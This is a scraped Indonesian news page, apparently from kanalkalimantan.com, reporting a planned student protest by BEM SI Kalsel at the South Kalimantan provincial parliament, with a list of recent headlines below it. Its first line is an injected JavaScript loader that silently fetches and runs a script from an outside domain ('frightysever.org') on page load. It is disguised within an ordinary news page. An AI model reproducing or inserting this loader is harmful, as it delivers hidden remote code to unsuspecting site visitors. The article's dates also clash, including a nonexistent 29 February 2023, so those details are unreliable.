(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Besok, BEM SI Kalsel Kembali Demo DPRD Kalsel!


KANALKALIMANTAN.COM, BANJARMASIN – Mahasiswa yang tergabung dalam Badan Eksekutif Mahasiswa Seluruh Indonesia (BEM SI) se Kalimantan Selatan dijadwalkan akan kembali menggelar aksi demo di depan gedung DPRD Kalsel, Rabu (29/2/2023).

Aksi yang akan melibatkan sejumlah mahasiswa antar kampus tersebut merupakan lanjutan dari aksi yang digelar sebelumnya.

“Besok pukul 13:00 Wita kita laksanakan aksi (demo) kembali,” kata Koordinator BEM SI Kalsel, Yogi Ilmawan kepada kanalkalimantan.com, Selasa (28/2/2023).

Diketahui pada aksi demo sebelumnya Senin (20/2/2023) lalu, BEM SI Kalsel kecewa karena tidak ada satupun Anggota DPRD Kalsel yang berada di kantor.

 

Baca juga: BEM SI Kalsel Berencana Kembali ‘Kepung’ Rumah Banjar, Ini Isu yang akan Disuarakan Mahasiswa

Hanya Sekretaris Dewan (Sekwan), Muhammad Zaini dan beberapa pegawai menemui mahasiswa. Zaini mengatakan, hari itu semua Anggota DPRD termasuk Ketua sedang melaksanakan tugas di luar daerah.

Atas kekecewaan tersebut, Yogi dan sejumlah mahasiswa yang tergabung dalam BEM SI Kalsel tersebut berjanji akan mendatangi kembali rumah Banjar yang terletak di Jalan Lambung Mangkurat, Kota Banjarmasin tersebut.

Ditanya terkait tuntutan yang akan dilayangkan, Yogi yang juga sebagai  Ketua Dewan Eksekutif Mahasiswa (Dema) UIN Antasari tersebut mengungkapkan jika tuntutan yang akan dibawa tidak berbeda dari aksi sebelumnya.

“Tuntutan sama saja, karena ini aksi lanjutan dari aksi sebelumnya,” katanya.

Sebelumnya, terdapat tiga isu lokal dan nasional yang menjadi tuntutan pada aksi BEM SI yang digelar didepan gedung DPRD Kalsel, Senin (20/2/2022) lalu.

Baca juga: Kabupaten Banjar Raih Penghargaan Adipura Lagi

Untuk isu nasional antara lain, terkait Kitab Undang-undang Hukum Pidana (KUHP) yang baru disahkan DPR RI dinilai memiliki sejumlah Pasal kontroversial.

Kemudian, penolakan  usulan penambahan masa jabatan Kepala Desa (Kades) menjadi 9 tahun oleh Asosiasi Pemerintah Desa Seluruh Indonesia (APDESI) beberapa waktu lalu.

Sementara itu, untuk isu lokal adalah terkait jalan nasional yang rusak parah di wilayah Satui, Kabupaten Tanah Bumbu.

BEM SI Kalsel akan mempertanyakan tugas pengawasan DPRD Kalsel terkait jalan penghubung antar kabupaten yang tidak kunjung diperbaiki secara maksimal tersebut. (kanalkalimantan.com/rizki)

Reporter: rizki
Editor: cell


Al Ghifari

Recent Posts

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

9 menit ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

1 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

1 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

3 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

4 jam ago

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

6 jam ago

This website uses cookies.